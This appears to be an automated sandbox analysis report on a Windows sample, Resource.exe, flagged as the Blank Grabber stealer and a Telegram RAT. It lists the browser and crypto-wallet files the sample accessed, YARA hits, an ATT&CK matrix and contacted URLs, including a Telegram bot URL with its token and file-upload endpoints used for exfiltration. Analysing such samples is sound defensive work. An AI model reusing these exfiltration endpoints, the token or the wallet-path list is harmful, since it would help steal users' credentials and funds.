Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match	File source: 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Resource.exe PID: 6048, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2019140558.00000203A2F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2473117545.0000020AB3C0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2019140558.00000203A2F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2467713655.0000020AB46E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Resource.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Resource.exe PID: 6048, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI66322\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Resource.exe PID: 6048, type: MEMORYSTR

Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E545E8 bind,		1_2_00007FF8B7E545E8
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E555FC listen,		1_2_00007FF8B7E555FC

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	3 Disable or Modify Tools	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	222 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	11 Deobfuscate/Decode Files or Information	Security Account Manager	49 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	NTDS	251 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	11 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	141 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	11 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Resource.exe	72%	Virustotal		Browse
Resource.exe	66%	ReversingLabs	Win64.Trojan.Znyonm
Resource.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI66322\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\python311.dll	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\select.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\sqlite3.dll	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66322\unicodedata.pyd	4%	ReversingLabs

Source	Detection	Scanner	Label
http://www.microsoftZXCVBN~1DB-y.	0%	Avira URL Cloud	safe
http://www.microsoftOWNLO~1.TXTy.	0%	Avira URL Cloud	safe
http://www.microsoft100~1.5.PBy.	0%	Avira URL Cloud	safe
http://www.microsoft00~1.5.JSOy.	0%	Avira URL Cloud	safe
https://api.anonfiles.com/uploadr	0%	Avira URL Cloud	safe
https://en.wikipedi	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ip-api.com	208.95.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
blank-63z6o.in	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6723507541:AAFus4a_vfOH23XVGo8SFLxAeDedGw1G3vk/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/Blank-c/BlankOBF	Resource.exe, 00000001.00000003.2030164549.0000020AB38C8000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030015652.0000020AB38EC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030430138.0000020AB392B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030064983.0000020AB388D000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2029783273.0000020AB3EC2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.avito.ru/	Resource.exe, 00000001.00000002.2475663980.0000020AB4088000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/Blank-c/Blank-Grabberi	Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 0000000E.00000002.2278599707.000001CEDBD4F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Blank-c/Blank-Grabberr	Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	Resource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.leboncoin.fr/	Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc2388#section-4.4	Resource.exe, 00000001.00000002.2472335398.0000020AB36AD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	Resource.exe, 00000001.00000003.2033270433.0000020AB37F2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035529511.0000020AB37E0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://weibo.com/	Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.anonfiles.com/upload	Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.msn.com	Resource.exe, 00000001.00000002.2477629542.0000020AB4FAC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.2266669419.000001CED38F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D6EED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E573D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com/api/v9/users/	Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	Resource.exe, 00000001.00000002.2475527189.0000020AB3EC0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cacerts.digi	Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0205/	Resource.exe, 00000001.00000002.2472518311.0000020AB36C0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	false		high
https://www.reddit.com/	Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000E.00000002.2197740500.000001CEC3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D5581000.00000004.00000800.00020000.00000000.sdmp	false		high
https://en.wikipedi	Resource.exe, 00000001.00000003.2024701640.0000020AB381C000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2029000040.0000020AB381C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.ca/	Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.microsoftZXCVBN~1DB-y.	Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	Resource.exe, 00000001.00000002.2475852502.0000020AB40C0000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	Resource.exe, 00000001.00000002.2472003336.0000020AB3168000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000E.00000002.2197740500.000001CEC3AAA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000044.00000002.2259141089.000001B7D67F9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	Resource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/	Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/issues/86361.	Resource.exe, 00000001.00000003.2033438155.0000020AB3883000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472335398.0000020AB3636000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2033114916.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2033504916.0000020AB3CBD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://httpbin.org/	Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	Resource.exe, 00000001.00000003.2032559881.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032855046.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3BFE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://allegro.pl/	Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472335398.0000020AB3636000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	Resource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://MD8.mozilla.org/1/m	Resource.exe, 00000001.00000003.2360929970.0000020AB47BA000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2205878951.0000020AB47BA000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB42AC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.python.org/psf/license/	Resource.exe, Resource.exe, 00000001.00000002.2483357030.00007FF8A8D68000.00000040.00000001.01000000.00000004.sdmp	false		high
https://www.bbc.co.uk/	Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	false		high
https://bugzilla.mo	Resource.exe, 00000001.00000002.2476060853.0000020AB41C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.anonfiles.com/uploadr	Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3	Resource.exe, 00000001.00000002.2475852502.0000020AB419C000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.microsoft100~1.5.PBy.	Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft00~1.5.JSOy.	Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000E.00000002.2197740500.000001CEC3AAA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google.com/mail	Resource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473117545.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2363232730.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2162875077.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2208655261.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182427502.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	Resource.exe, 00000001.00000003.2032559881.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032855046.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.iqiyi.com/	Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	false		high
https://foss.heptapod.net/pypy/pypy/-/issues/3539	Resource.exe, 00000001.00000002.2475527189.0000020AB3EC0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	Resource.exe, 00000001.00000002.2472629307.0000020AB3932000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com/	Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/download/releases/2.3/mro/.	Resource.exe, 00000001.00000002.2472003336.0000020AB30E0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	false		high
https://api.gofile.io/getServerr~	Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discordapp.com/api/v9/users/	Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ip-api.com/json/?fields=225545r	Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2920	Resource.exe, 00000001.00000002.2475852502.0000020AB40C0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.gofile.io/getServerr~r	Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://yahoo.com/	Resource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473117545.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2363232730.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2162875077.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2208655261.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182427502.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.microsoftOWNLO~1.TXTy.	Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.bellmedia.c	Resource.exe, 00000001.00000002.2477629542.0000020AB4FAC000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	Resource.exe, 00000001.00000002.2472335398.0000020AB36AD000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035643120.0000020AB3D10000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2036471836.0000020AB3CF2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035643120.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com	Resource.exe, 00000001.00000002.2477629542.0000020AB4FA4000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cacerts.digicert.co	Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	false		high
